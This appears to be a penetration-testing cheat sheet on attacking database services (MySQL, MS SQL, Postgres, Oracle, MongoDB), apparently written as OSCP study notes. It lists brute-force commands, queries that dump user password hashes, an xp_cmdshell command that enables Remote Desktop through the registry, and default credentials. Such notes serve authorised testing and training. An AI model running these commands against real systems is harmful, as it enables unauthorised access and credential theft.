Databases
[3306,MySQL]
Links https://recipeforroot.com/mysql-to-system-root/ https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/ https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/ https://www.electrictoolbox.com/shell-commands-mysql-command-line-client/
https://sushant747.gitbooks.io/total-oscp-guide/list_of_common_ports.html https://www.electrictoolbox.com/shell-commands-mysql-command-line-client/ https://highon.coffee/blog/lord-of-the-root-walkthrough/
Very often has a root user, can be brute forced
If you have a local shell try this bash script to override for the root account(worth a try) while [ 1 ];do mysql -u root --password=123; done
Connect to MySQL mysql -u root -p
## MySQL Database
mysql -h 192.168.100.138 -p
show databases;
use databasename;
show tables;
describe table;
select * from payments [where id=9];
select @@versionl
### Non interactive shell
mysql -uroot -proot -e 'show databases;'
mysql -uroot -proot -e 'use SkyTech; show tables;'
mysql -uroot -proot -e 'use SkyTech; select * from login;'
ENUM
SELECT @@version;
SELECT @@hostname;
SELECT @@datadir;
SELECT user();
SELECT system_user();
SELECT user FROM mysql.user;
SELECT host, user, password FROM mysql.user;
SELECT database()
DATABASES
SHOW DATABASES
SELECT * FROM information_schema.tables;
SELECT schema_name FROM information_schema.schemata;
SELECT distinct(db) FROM mysql.db — priv
TABLES
SHOW TABLES
SELECT table_name FROM information_schema.tables WHERE table_schema !=
‘mysql’ AND table_schema != ‘information_schema’
COLUMNS
DESCRIBE table
SELECT column_name FROM information_schema.columns WHERE table_schema
!= ‘mysql’ AND table_schema != ‘information_schema’
[1433,1434,mssql] UDP 1433,1334
MS SQL Server Enumeration https://www.hackingarticles.in/mssql-peneration-testing-using-nmap/ https://www.adampalmer.me/iodigitalsec/2013/08/10/accessing-and-hacking-mssql-from-backtrack-linux/ http://travisaltman.com/pen-test-and-hack-microsoft-sql-server-mssql/ https://www.google.com/search?client=safari&rls=en&q=mssql+default+passwords&ie=UTF-8&oe=UTF-8 http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip
Leverage xp_cmdshell to get a shell If xp_cmdshell is not turned on then you have to enable it. This requires "advanced options" to be on:
Enable Remote Desktop xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
go
Use Nmap to remotely execute commands through MS-SQL
Metasploit:
Postgres 5432,5433
No root user but psql or postgres psql -h 192.168.100.138 -p 5433 -U root -w
hydra -l postgres -P weak.txt postgres://192.168.100.138
psql -h 192.168.100.138 -p 5433 -U postgres
Oracle port 1521,1541
https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573 https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#oracle https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener https://www.doyler.net/security-not-included/oracle-command-execution-sys-shell https://security.stackexchange.com/questions/95729/oracle-sql-injection-reverse-shell
Enumerate version info (search for known vulns)
Bruteforce TNS listener communication (not always needed)
Enumerate/Bruteforce SID names (like database names)
Bruteforce credentials for valid SID name discovered
Try to execute code
Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm tnscmd10g status -h INSERTIPADDRESS
a lot of default passwords available
Port 2100 - Oracle XML DB sys:sys scott:tiger
No SQL
Often means no authentication, brute force is fast because design of databases like reddis
[27017,mongod]
nmap {nmap_extra} -sV -p {port} --script="mongodb*"
You may encounter NoSQL instances like MongoDB in your OSCP journies (/cgi-bin/mongo/2.2.3/dbparse.py
). NoSQLMap can help you to automate NoSQLDatabase enumeration.
NoSQLMap Examples
NoSQLMap Installation
/usr/share/wordlists/SecLists/Passwords/Default-Credentials/mssql-betterdefaultpasslist.txt hydra -C default_accounts.txt ftp://localhost
MySql, Oracle, PostgreSQL, SQLlite, MS-Sql bruteforcer and database browser
hexorbase
nmap {nmap_extra} -sV -p {port} --script="(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" --script-args="mssql.instance-port={port},mssql.username=sa,mssql.password=sa"
[50000,DB2]
Last updated
Was this helpful?